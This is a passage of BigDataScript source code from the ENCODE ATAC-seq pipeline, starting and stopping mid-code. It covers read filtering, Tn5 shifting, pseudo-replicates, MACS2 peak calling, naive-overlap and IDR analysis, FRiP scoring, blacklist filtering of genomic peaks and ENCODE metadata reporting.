) } // add to report filt_bam{rep} = filt_bam_ add_file_to_report( filt_bam_, "filt. bam" + (deduped_reads ? "\\n$deduped_reads" : ""), group, \ "Alignment/$long/Filtered & deduped bam" + (deduped_reads ? " ($deduped_reads)" : "") ) if ( is_input_fastq( rep ) ) { string ENCODE_step_name if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1" if ( fastqs_pair1.size() > 0 || fastqs_pair2.size() > 0 ) { add_ENCODE_metadata_to_summary_json( "bam", "", "alignments", \ ENCODE_step_name, filt_bam_, fastqs_pair1_arr+fastqs_pair2_arr ) } if ( flagstat_qc_) { add_ENCODE_quality_metrics_to_summary_json( "samtools_flagstats_quality_metric", \ ENCODE_step_name, [filt_bam_], [flagstat_qc_] ) } } } // string bedpe, subsampled_bedpe, tag string bedpe, tag if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) ) { if ( is_input_filt_bam( rep ) ) { filt_bam_ = get_filt_bam( 0, rep ) filt_bam{rep} = filt_bam_ } bedpe = bam_to_bedpe( filt_bam_, aln_o_dir, group ) wait if ( adjust_bedpe ) { tag = bedpe_to_tag_adj( bedpe, aln_o_dir, group ) } else { tag = bedpe_to_tag( bedpe, aln_o_dir, group ) } wait } string final_tag_, final_tag_pr1_, final_tag_pr2_ if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) || is_input_tag( rep ) ) { if ( is_input_tag( rep ) ) tag = get_tag( 0, rep ) string subsampled_tag if ( parse_number( subsample ) != 0 ) { subsampled_tag = subsample_tag_PE( tag, parse_number( subsample ), false, aln_o_dir, group ) wait } else { subsampled_tag = tag } if ( is_dnase_seq() ) { final_tag_ = subsampled_tag } else { final_tag_ = tn5_shift_tag( subsampled_tag, aln_o_dir, group ) } final_tag{rep} = final_tag_ add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" ) if ( !true_rep ) { aln_pr1_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr1" ) aln_pr2_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr2" ) ( final_tag_pr1_, final_tag_pr2_ ) = spr_tag_PE( final_tag_, aln_pr1_o_dir, aln_pr2_o_dir, group ) final_tag_pr1{rep} = final_tag_pr1_ final_tag_pr2{rep} = final_tag_pr2_ add_file_to_report( final_tag_pr1_, "tag-align", "$group-pr1", \ "Alignment/Pseudo-replicates/$long/Pseudo-replicate 1/Tag-align" ) add_file_to_report( final_tag_pr2_, "tag-align", "$group-pr2", \ "Alignment/Pseudo-replicates/$long/Pseudo-replicate 2/Tag-align" ) wait } if ( !no_xcor ) { subsampled_tag_xcor := subsample_tag_PE_for_xcor( final_tag_, parse_number( subsample_xcor ), true, aln_o_dir, group ) wait // cross-corr. analysis string xcor_qc_, xcor_plot_ ( xcor_qc_, xcor_plot_ ) = xcor( subsampled_tag_xcor, qc_o_dir, group, nth_rep ) xcor_qc{rep} = xcor_qc_ xcor_plot{rep} = xcor_plot_ add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" ) add_file_to_table( xcor_plot_, "QC and logs/$long/Cross-corr. plot" ) wait string ENCODE_step_name if ( pbc_qc_ && read_length_log ) { if ( get_num_rep() == 1 ) \ ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1" else \ ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "complexity_xcorr_quality_metric", \ ENCODE_step_name, \ [filt_bam_], [pbc_qc_, xcor_qc_, read_length_log], [ "true", xcor_plot_] ) } } } } void read_input_peak() { if ( !is_input_peak() ) return // read peaks here for ( int rep=0; rep<=get_num_rep_peak(); rep++) { // rep==0 : pooled if ( get_num_rep_peak() == 1 && rep==0 ) continue // if only one replicate, skip reading pooled rep for (int pse=0; pse<=2; pse++) { // pse==0 : true rep if ( true_rep && pse > 0 ) continue peak_ := get_peak(rep,pse) if ( rep == 0 ) { if ( pse == 0 ) peak_pooled = peak_ else if ( pse == 1 ) peak_ppr1 = peak_ else if ( pse == 2 ) peak_ppr2 = peak_ } else { if ( pse == 0 ) peak{rep} = peak_ else if ( pse == 1 ) peak_pr1{rep} = peak_ else if ( pse == 2 ) peak_pr2{rep} = peak_ } } } } void call_peaks() { // for pooling two replicates and calling peaks on them if ( align ) return if ( is_input_peak() ) return // pool tag-aligns string[] tags, tags_pr1, tags_pr2 for ( int rep=1; rep<=get_num_rep(); rep++ ) { tags.add( final_tag{rep} ) if ( !true_rep ) { tags_pr1.add( final_tag_pr1{rep} ) tags_pr2.add( final_tag_pr2{rep} ) } } if ( get_num_rep() > 1 ) { aln_pooled_o_dir := mkdir( "$out_dir/align/pooled_rep" ) final_tag_pooled = pool_tag( tags, aln_pooled_o_dir, "pooled_rep" ) add_file_to_report( final_tag_pooled, "tag-align", "pooled_rep", "Alignment/Pooled replicate/Tag-align" ) if ( !true_rep ) { // Make shifted tags for pooled pseudo rep (ppr). aln_ppr1_o_dir := mkdir( "$out_dir/align/pooled_pseudo_reps/ppr1" ) aln_ppr2_o_dir := mkdir( "$out_dir/align/pooled_pseudo_reps/ppr2" ) final_tag_ppr1 = pool_tag( tags_pr1, aln_ppr1_o_dir, "ppr1" ) final_tag_ppr2 = pool_tag( tags_pr2, aln_ppr2_o_dir, "ppr2" ) add_file_to_report( final_tag_ppr1, "tag-align", "ppr1", "Alignment/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Tag-align" ) add_file_to_report( final_tag_ppr2, "tag-align", "ppr2", "Alignment/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Tag-align" ) } wait } string tmp // call peaks for each replicate for ( int rep=1; rep<=get_num_rep(); rep++ ) { group := get_group_name( rep ) long := get_long_group_name( rep ) // call peaks peak_o_dir := mkdir( "$out_dir/peak/macs2/$group") sig_o_dir := mkdir( "$out_dir/signal/macs2/$group" ) // signal track generation = true string peak_001_, gpeak_001_ ( peak_001_, fc_bigwig_001{rep}, pval_bigwig_001{rep} ) \ = macs2_atac_npeak_and_signal( final_tag{rep}, "$smooth_win", macs2_pval_thresh_bw, true, peak_o_dir, sig_o_dir, group ) peak_001{rep} = peak_001_ add_file_to_report( peak_001{rep}, "n. peak\\np-val<$macs2_pval_thresh_bw", group, \ "Peaks/MACS2/$long/Narrow peak (p-val thresh=$macs2_pval_thresh_bw)" ) add_file_to_report( fc_bigwig_001{rep}, "signal fc", group, "Signal tracks/MACS2/$long/Fold enrichment" ) add_file_to_report( pval_bigwig_001{rep}, "signal p-val", group, "Signal tracks/MACS2/$long/P-value" ) if ( !disable_gb_peak ) { ( gpeak_001_, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag{rep}, "$smooth_win", macs2_pval_thresh_bw, peak_o_dir, group ) gpeak_001{rep} = gpeak_001_ add_file_to_report( gpeak_001{rep}, "g. peak\\np-val<$macs2_pval_thresh_bw", group, \ "Peaks/MACS2/$long/Gapped peak (p-val thresh=$macs2_pval_thresh_bw)" ) } if ( macs2_pval_thresh_bw == macs2_pval_thresh ) { // if two p-val threshold are the same, skip one of them. peak{rep} = peak_001_ if ( !disable_gb_peak ) { gpeak{rep} = gpeak_001_ } } else { ( peak{rep}, tmp ) \ = macs2_atac_npeak_and_signal( final_tag{rep}, "$smooth_win", macs2_pval_thresh, false, peak_o_dir, sig_o_dir, group ) add_file_to_report( peak{rep}, "n. peak", group, "Peaks/MACS2/$long/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak{rep}, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag{rep}, "$smooth_win", macs2_pval_thresh, peak_o_dir, group ) add_file_to_report( gpeak{rep}, "g. peak", group, "Peaks/MACS2/$long/Gapped peak" ) } } if ( !true_rep ) { peak_pr1_o_dir := mkdir( "$out_dir/peak/macs2/pseudo_reps/$group/pr1" ) peak_pr2_o_dir := mkdir( "$out_dir/peak/macs2/pseudo_reps/$group/pr2" ) sig_pr1_o_dir := mkdir( "$out_dir/signal/macs2/pseudo_reps/$group/pr1" ) sig_pr2_o_dir := mkdir( "$out_dir/signal/macs2/pseudo_reps/$group/pr2" ) // ( peak_pr1{rep}, gpeak_pr1{rep} ) \ ( peak_pr1{rep}, tmp ) \ = macs2_atac_npeak_and_signal( final_tag_pr1{rep}, "$smooth_win", macs2_pval_thresh, false, peak_pr1_o_dir, sig_pr1_o_dir, "$group-pr1" ) add_file_to_report( peak_pr1{rep}, "n. peak", "$group-pr1", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 1/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak_pr1{rep}, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_pr1{rep}, "$smooth_win", macs2_pval_thresh, peak_pr1_o_dir, "$group-pr1" ) add_file_to_report( gpeak_pr1{rep},"g. peak", "$group-pr1", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 1/Gapped peak" ) } // ( peak_pr2{rep}, gpeak_pr2{rep} ) \ ( peak_pr2{rep}, tmp ) \ = macs2_atac_npeak_and_signal( final_tag_pr2{rep}, "$smooth_win", macs2_pval_thresh, false, peak_pr2_o_dir, sig_pr2_o_dir, "$group-pr2" ) add_file_to_report( peak_pr2{rep}, "n. peak", "$group-pr2", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 2/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak_pr2{rep}, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_pr2{rep}, "$smooth_win", macs2_pval_thresh, peak_pr2_o_dir, "$group-pr2" ) add_file_to_report( gpeak_pr2{rep},"g. peak", "$group-pr2", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 2/Gapped peak" ) } } } // call peaks for pooled replicates if ( get_num_rep() > 1 ) { peak_o_dir := mkdir( "$out_dir/peak/macs2") sig_o_dir := mkdir( "$out_dir/signal/macs2") pooled_o_dir := mkdir( "$peak_o_dir/pooled_rep" ) pooled_sig_o_dir:= mkdir( "$sig_o_dir/pooled_rep" ) // macs2 on pooled reps, signal tracks are generated ( peak_pooled_001, fc_bigwig_001{"pooled"}, pval_bigwig_001{"pooled"} ) \ = macs2_atac_npeak_and_signal( final_tag_pooled, "$smooth_win", macs2_pval_thresh_bw, true, pooled_o_dir, pooled_sig_o_dir, "pooled_rep" ) add_file_to_report( peak_pooled_001, "n. peak\\np-val<$macs2_pval_thresh_bw", "pooled_rep", "Peaks/MACS2/Pooled replicate/Narrow peak (p-val thresh=.01)" ) add_file_to_report( fc_bigwig_001{"pooled"}, "signal fc", "pooled_rep", "Signal tracks/MACS2/Pooled replicate/Fold enrichment" ) add_file_to_report( pval_bigwig_001{"pooled"}, "signal p-val", "pooled_rep", "Signal tracks/MACS2/Pooled replicate/P-value" ) if ( !disable_gb_peak ) { ( gpeak_pooled_001, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_pooled, "$smooth_win", macs2_pval_thresh_bw, pooled_o_dir, "pooled_rep" ) add_file_to_report( gpeak_pooled_001, "g. peak\\np-val<$macs2_pval_thresh_bw", "pooled_rep", "Peaks/MACS2/Pooled replicate/Gapped peak (p-val thresh=.01)" ) } // macs2 on pooled reps if ( macs2_pval_thresh_bw == macs2_pval_thresh ) { // if two p-val threshold are the same, skip one of them. peak_pooled = peak_pooled_001 if ( !disable_gb_peak ) { gpeak_pooled = gpeak_pooled_001 } } else { ( peak_pooled, tmp ) \ = macs2_atac_npeak_and_signal( final_tag_pooled, "$smooth_win", macs2_pval_thresh, false, pooled_o_dir, pooled_sig_o_dir, "pooled_rep" ) add_file_to_report( peak_pooled, "n. peak", "pooled_rep", "Peaks/MACS2/Pooled replicate/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak_pooled, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_pooled, "$smooth_win", macs2_pval_thresh, pooled_o_dir, "pooled_rep" ) add_file_to_report( gpeak_pooled, "g. peak", "pooled_rep", "Peaks/MACS2/Pooled replicate/Gapped peak" ) } } if ( !true_rep ) { ppr1_o_dir := mkdir( "$peak_o_dir/pooled_pseudo_reps/ppr1" ) ppr2_o_dir := mkdir( "$peak_o_dir/pooled_pseudo_reps/ppr2" ) ppr1_sig_o_dir := mkdir( "$sig_o_dir/pooled_pseudo_reps/ppr1" ) ppr2_sig_o_dir := mkdir( "$sig_o_dir/pooled_pseudo_reps/ppr2" ) // call peaks on ppr ( peak_ppr1, tmp ) \ = macs2_atac_npeak_and_signal( final_tag_ppr1, "$smooth_win", macs2_pval_thresh, false, ppr1_o_dir, ppr1_sig_o_dir, "ppr1" ) add_file_to_report( peak_ppr1, "n. peak", "ppr1", "Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak_ppr1, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_ppr1, "$smooth_win", macs2_pval_thresh, ppr1_o_dir, "ppr1" ) add_file_to_report( gpeak_ppr1, "g. peak", "ppr1","Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Gapped peak" ) } // ( peak_ppr2, gpeak_ppr2 ) \ ( peak_ppr2, tmp ) \ = macs2_atac_npeak_and_signal( final_tag_ppr2, "$smooth_win", macs2_pval_thresh, false, ppr2_o_dir, ppr2_sig_o_dir, "ppr2" ) add_file_to_report( peak_ppr2, "n. peak", "ppr2", "Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Narrow peak" ) if ( !disable_gb_peak ) { ( gpeak_ppr2, tmp ) \ = macs2_atac_gpeak_and_bpeak( final_tag_ppr2, "$smooth_win", macs2_pval_thresh, ppr2_o_dir, "ppr2" ) add_file_to_report( gpeak_ppr2, "g. peak", "ppr2","Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Gapped peak" ) } } } wait print( "\n== Done call_peaks()\n" ) } void do_naive_overlap() { if ( align ) return // naive overlap peak overlap_o_dir := mkdir( "$out_dir/peak/macs2/overlap" ) for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { peak_overlap_true_o_dir := mkdir( "$overlap_o_dir/true_reps/rep$i-rep$j" ) peak_overlap_tr{"$i,$j"} \ = naive_overlap_peak( "narrowPeak", peak{i}, peak{j}, peak_pooled, \ peak_overlap_true_o_dir, "rep$i-rep$j" ) add_file_to_report( peak_overlap_tr{"$i,$j"}, "n. peak\\noverlap", "rep$i-rep$j", \ "Peaks/MACS2/Naive overlap/True replicates/Rep. $i vs. Rep. $j/Narrow peak" ) } if ( !true_rep ) { peak_overlap_pr_o_dir := mkdir( "$overlap_o_dir/pseudo_reps/rep$i" ) peak_overlap_pr{i} \ = naive_overlap_peak( "narrowPeak", peak_pr1{i}, peak_pr2{i}, peak{i}, \ peak_overlap_pr_o_dir, "rep$i-pr" ) add_file_to_report( peak_overlap_pr{i}, "n. peak\\noverlap", "rep$i-pr", \ "Peaks/MACS2/Naive overlap/Pseudo-replicates/Replicate $i/Narrow peak" ) } } if ( !true_rep && get_num_rep() > 1 ) { peak_overlap_ppr_o_dir := mkdir( "$overlap_o_dir/pooled_pseudo_reps" ) peak_overlap_ppr \ = naive_overlap_peak( "narrowPeak", peak_ppr1, peak_ppr2, peak_pooled, \ peak_overlap_ppr_o_dir, "ppr" ) add_file_to_report( peak_overlap_ppr, "n. peak\\noverlap", "ppr", \ "Peaks/MACS2/Naive overlap/Pooled pseudo-replicates/Narrow peak" ) } wait // FRiP calculation for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { peak_overlap_true_o_dir := mkdir( "$overlap_o_dir/true_reps/rep$i-rep$j" ) if ( final_tag_pooled ) { peak_overlap_qc_FRiP{"rep$i-rep$j"} = \ FRiP( final_tag_pooled, peak_overlap_tr{"$i,$j"}, peak_overlap_true_o_dir, "rep$i-rep$j" ) add_file_to_table( peak_overlap_qc_FRiP{"rep$i-rep$j"}, \ "QC and logs/Naive overlap/True replicates/Rep. $i vs. Rep. $j/FRiP" ) } } if ( !true_rep ) { peak_overlap_pr_o_dir := mkdir( "$overlap_o_dir/pseudo_reps/rep$i" ) if ( final_tag.hasKey(i) ) { peak_overlap_qc_FRiP{"rep$i-pr"} = \ FRiP( final_tag{i}, peak_overlap_pr{i}, peak_overlap_pr_o_dir, "rep$i-pr" ) add_file_to_table( peak_overlap_qc_FRiP{"rep$i-pr"}, \ "QC and logs/Naive overlap/Pseudo-replicates/Replicate $i/FRiP" ) } } } if ( !true_rep && get_num_rep() > 1 ) { peak_overlap_ppr_o_dir := mkdir( "$overlap_o_dir/pooled_pseudo_reps" ) if ( final_tag_pooled ) { peak_overlap_qc_FRiP{"ppr"} = FRiP( final_tag_pooled, peak_overlap_ppr, peak_overlap_ppr_o_dir, "ppr" ) add_file_to_table( peak_overlap_qc_FRiP{"ppr"}, "QC and logs/Naive overlap/Pooled pseudo-replicates/FRiP" ) } } wait qc_o_dir := mkdir( "$out_dir/qc" ) // create qc output dir. // get final idr qc score, use idr final idr narrow peak files from true, pseudo and pooled pseudo reps if ( !true_rep ) { (peak_overlap_qc, peak_overlap_opt, peak_overlap_consv) = peak_overlap_final_qc( peak_overlap_tr, peak_overlap_pr, peak_overlap_ppr, overlap_o_dir, qc_o_dir, "" ) add_file_to_report( peak_overlap_qc, "Naive overlap QC log", "", "QC and logs/Naive overlap/Naive overlap QC log" ) add_file_to_report( peak_overlap_opt, "opt. naive overlap peak", "", "Peaks/MACS2/Naive overlap/Optimal set/Overlapping peak" ) add_file_to_report( peak_overlap_consv, "consv. naive overlap peak", "", "Peaks/MACS2/Naive overlap/Conservative set/Overlapping peak" ) } print( "\n== Done naive_overlap()\n" ) } void do_idr() { if ( align || !enable_idr ) return // do IDR peak_o_dir := "$out_dir/peak/macs2" idr_o_dir_old_version := "$peak_o_dir/../idr" idr_o_dir := "$peak_o_dir/idr" // for backward compatibility (old version has idr on out/peak), make symlink for old dir. to new dir. if ( path_exists( idr_o_dir_old_version ) ) { system := "local" task { sys cd $peak_o_dir sys rm -f idr sys ln -s ../idr } } else { idr_o_dir = mkdir( idr_o_dir ) } wait for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { idr_true_o_dir := mkdir( "$idr_o_dir/true_reps/rep$i-rep$j" ) (idr_tr{"$i,$j"}, idr_tr_png{"$i,$j"}, idr_tr_log{"$i,$j"} ) \ = idr2( peak{i}, peak{j}, peak_pooled, idr_thresh, "p.value", idr_true_o_dir, "rep$i-rep$j" ) add_file_to_report( idr_tr{"$i,$j"}, "IDR peak", "rep$i-rep$j", "Peaks/MACS2/IDR/True replicates/Rep. $i vs. Rep. $j/IDR peak" ) add_file_to_table( idr_tr_png{"$i,$j"}, "QC and logs/IDR/True replicates/Rep. $i vs. Rep. $j/IDR plot" ) } if ( !true_rep ) { idr_pr_o_dir := mkdir( "$idr_o_dir/pseudo_reps/rep$i" ) (idr_pr{i}, idr_pr_png{i}, idr_pr_log{i}) \ = idr2( peak_pr1{i}, peak_pr2{i}, peak{i}, idr_thresh, "p.value", idr_pr_o_dir, "rep$i-pr" ) add_file_to_report( idr_pr{i}, "IDR peak", "rep$i-pr", "Peaks/MACS2/IDR/Pseudo-replicates/Replicate $i/IDR peak" ) add_file_to_table( idr_pr_png{i}, "QC and logs/IDR/Pseudo-replicates/Replicate $i/IDR plot" ) } } if ( !true_rep && get_num_rep() > 1 ) { idr_ppr_o_dir := mkdir( "$idr_o_dir/pooled_pseudo_reps" ) (idr_ppr, idr_ppr_png, idr_ppr_log) \ = idr2( peak_ppr1, peak_ppr2, peak_pooled, idr_thresh, "p.value", idr_ppr_o_dir, "ppr" ) add_file_to_report( idr_ppr, "IDR peak", "ppr", "Peaks/MACS2/IDR/Pooled pseudo-replicates/IDR peak" ) add_file_to_table( idr_ppr_png, "QC and logs/IDR/Pooled pseudo-replicates/IDR plot" ) } wait // FRiP calculation for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { idr_true_o_dir := mkdir( "$idr_o_dir/true_reps/rep$i-rep$j" ) if ( final_tag_pooled ) { idr_qc_FRiP{"rep$i-rep$j"} = \ FRiP( final_tag_pooled, idr_tr{"$i,$j"}, idr_true_o_dir, "rep$i-rep$j" ) add_file_to_table( idr_qc_FRiP{"rep$i-rep$j"}, \ "QC and logs/IDR/True replicates/Rep. $i vs. Rep. $j/FRiP" ) } } if ( !true_rep ) { idr_pr_o_dir := mkdir( "$idr_o_dir/pseudo_reps/rep$i" ) if ( final_tag.hasKey(i) ) { idr_qc_FRiP{"rep$i-pr"} = \ FRiP( final_tag{i}, idr_pr{i}, idr_pr_o_dir, "rep$i-pr" ) add_file_to_table( idr_qc_FRiP{"rep$i-pr"}, \ "QC and logs/IDR/Pseudo-replicates/Replicate $i/FRiP" ) } } } if ( !true_rep && get_num_rep() > 1 ) { idr_ppr_o_dir := mkdir( "$idr_o_dir/pooled_pseudo_reps" ) if ( final_tag_pooled ) { idr_qc_FRiP{"ppr"} = FRiP( final_tag_pooled, idr_ppr, idr_ppr_o_dir, "ppr" ) add_file_to_table( idr_qc_FRiP{"ppr"}, "QC and logs/IDR/Pooled pseudo-replicates/FRiP" ) } } wait qc_o_dir := mkdir( "$out_dir/qc" ) // create qc output dir. // get final idr qc score, use idr final idr narrow peak files from true, pseudo and pooled pseudo reps if ( !true_rep ) { (idr_qc, idr_opt, idr_consv) = idr_final_qc( idr_tr, idr_pr, idr_ppr, idr_o_dir, qc_o_dir, "" ) add_file_to_report( idr_qc, "IDR QC log", "", "QC and logs/IDR/IDR QC log" ) add_file_to_report( idr_opt, "opt. IDR peak", "", "Peaks/MACS2/IDR/Optimal set/IDR peak" ) add_file_to_report( idr_consv, "consv. IDR peak", "", "Peaks/MACS2/IDR/Conservative set/IDR peak" ) } print( "\n== Done do_idr()\n" ) } void log_number_of_peaks() { if ( align ) return log_o_dir := mkdir("$out_dir/qc") num_peak_log = "$log_o_dir/" + (title ? (title+"_") : "" ) + "number_of_peaks.txt" string lines for ( int rep=1; rep<=get_num_rep(); rep++) { // rep==0 : pooled if ( peak.hasKey(rep) ) \ lines += "rep$rep\t"+get_num_lines( peak{rep} )+"\n" if ( peak_pr1.hasKey(rep) ) \ lines += "rep$rep-pr1\t"+get_num_lines( peak_pr1{rep} )+"\n" if ( peak_pr2.hasKey(rep) ) \ lines += "rep$rep-pr2\t"+get_num_lines( peak_pr2{rep} )+"\n" } if ( peak_pooled ) \ lines += "pooled\t"+get_num_lines( peak_pooled )+"\n" if ( peak_ppr1 ) \ lines += "ppr1\t"+get_num_lines( peak_ppr1 )+"\n" if ( peak_ppr2 ) \ lines += "ppr2\t"+get_num_lines( peak_ppr2 )+"\n" // if ( peak_overlap_opt ) \ // lines += "overlap\t"+get_num_lines( peak_overlap_opt )+"\n" num_peak_log.write(lines) } // black list filter and then convert to bigbed (for true replicates only) void filter_peak_and_convert_to_bigbed() { if ( align ) return if ( !path_exists( blacklist ) ) return // peaks for true replicates if ( get_num_rep() > 1 ) { filt_peak_pooled_001 := \ blacklist_filter_peak( "narrowPeak", peak_pooled_001, peak_pooled_001.dirName(), "peak_pooled" ) string filt_gpeak_pooled_001 if ( !disable_gb_peak ) { filt_gpeak_pooled_001 = \ blacklist_filter_peak( "gappedPeak", gpeak_pooled_001, gpeak_pooled_001.dirName(), "gpeak_pooled" ) } wait peak_to_bigbed( "narrowPeak", filt_peak_pooled_001, filt_peak_pooled_001.dirName(), "peak_pooled" ) if ( !disable_gb_peak ) { peak_to_bigbed( "gappedPeak", filt_gpeak_pooled_001, filt_gpeak_pooled_001.dirName(), "gpeak_pooled" ) } } string[] filt_peaks, filt_gpeaks for (int rep=1; rep<=get_num_rep(); rep++) { filt_peak_001 := \ blacklist_filter_peak( "narrowPeak", peak_001{rep}, (peak_001{rep}).dirName(), "peak $rep" ) string filt_gpeak_001 if ( !disable_gb_peak ) { filt_gpeak_001 = \ blacklist_filter_peak( "gappedPeak", gpeak_001{rep}, (gpeak_001{rep}).dirName(), "gpeak $rep" ) } wait // For ENCODE accession, use different step name for single rep case string ENCODE_step_name if ( is_input_fastq( rep ) ) { if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-peaks-filter-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-peaks-filter-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "raw peaks", \ ENCODE_step_name, filt_peak_001, [filt_bam{rep}]) if ( !disable_gb_peak ) { add_ENCODE_metadata_to_summary_json( "bed", "gappedPeak", "raw peaks", \ ENCODE_step_name, filt_gpeak_001, [filt_bam{rep}]) } if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-signal-generation-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-signal-generation-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigWig", "", "signal p-value", \ ENCODE_step_name, pval_bigwig_001{rep}, [filt_bam{rep}]) add_ENCODE_metadata_to_summary_json( "bigWig", "", "fold change over control", \ ENCODE_step_name, fc_bigwig_001{rep}, [filt_bam{rep}]) npeak_bb := peak_to_bigbed( "narrowPeak", filt_peak_001, filt_peak_001.dirName(), "peak $rep" ) string gpeak_bb if ( !disable_gb_peak ) { gpeak_bb = peak_to_bigbed( "gappedPeak", filt_gpeak_001, filt_gpeak_001.dirName(), "gpeak $rep" ) } wait if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-filtered-peaks-to-bigbed-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-filtered-peaks-to-bigbed-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "raw peaks", \ ENCODE_step_name, npeak_bb, [filt_peak_001]) if ( !disable_gb_peak ) { add_ENCODE_metadata_to_summary_json( "bigBed", "gappedPeak", "raw peaks", \ ENCODE_step_name, gpeak_bb, [filt_gpeak_001]) } } filt_peaks.add(filt_peak_001) if ( !disable_gb_peak ) { filt_gpeaks.add(filt_gpeak_001) } } wait string ENCODE_step_name if ( enable_idr && idr_qc && idr_opt && idr_consv ) { string[] idr_ENCODE // IDR peaks if ( idr_pr.hasKey(1) && get_num_rep()==1 ) { idr_ENCODE = [idr_pr{1}] ENCODE_step_name = "anshul-kundaje:atac-seq-unreplicated-idr-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "pseudoreplicated idr thresholded peaks", \ ENCODE_step_name, idr_pr{1}, filt_peaks ) idr_bb := peak_to_bigbed( "narrowPeak", idr_pr{1}, idr_pr{1}.dirName(), "idr peak pr" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-pseudoreplicated-idr-peaks-conversion-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "pseudoreplicated idr thresholded peaks", \ ENCODE_step_name, idr_bb, [idr_pr{1}] ) } else { // find idr_opt and idr_consv idr_ENCODE = [idr_opt] ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "optimal idr thresholded peaks", \ ENCODE_step_name, idr_opt, filt_peaks ) idr_opt_bb := peak_to_bigbed( "narrowPeak", idr_opt, idr_opt.dirName(), "idr peak opt" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-idr-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "optimal idr thresholded peaks", \ ENCODE_step_name, idr_opt_bb, [idr_opt]) if ( idr_consv && get_basename( idr_opt )!=get_basename( idr_consv ) ) { ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "conservative idr thresholded peaks", \ ENCODE_step_name, idr_consv, filt_peaks ) idr_consv_bb := peak_to_bigbed( "narrowPeak", idr_consv, idr_consv.dirName(), "idr peak consv" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-idr-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "conservative idr thresholded peaks", \ ENCODE_step_name, idr_consv_bb, [idr_consv] ) } } if ( !true_rep ) { if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-unreplicated-idr-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-idr-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "idr_quality_metric", \ ENCODE_step_name, \ idr_ENCODE, \ [ idr_qc, \ idr_qc_FRiP.hasKey("ppr") ? idr_qc_FRiP{"ppr"} : "",\ idr_qc_FRiP.hasKey("rep1-rep2") ? idr_qc_FRiP{"rep1-rep2"} : "",\ idr_qc_FRiP.hasKey("rep1-pr") ? idr_qc_FRiP{"rep1-pr"} : "",\ idr_qc_FRiP.hasKey("rep2-pr") ? idr_qc_FRiP{"rep2-pr"} : ""], \ [ "$idr_thresh", \ idr_tr_png.hasKey("1,2") ? idr_tr_png{"1,2"} : "", \ idr_pr_png.hasKey(1) ? idr_pr_png{1} : "", \ idr_pr_png.hasKey(2) ? idr_pr_png{2} : "", \ idr_ppr_png, \ idr_tr_log.hasKey("1,2") ? idr_tr_log{"1,2"} : "", \ idr_pr_log.hasKey(1) ? idr_pr_log{1} : "", \ idr_pr_log.hasKey(2) ? idr_pr_log{2} : "", \ idr_ppr_log]) } } if ( 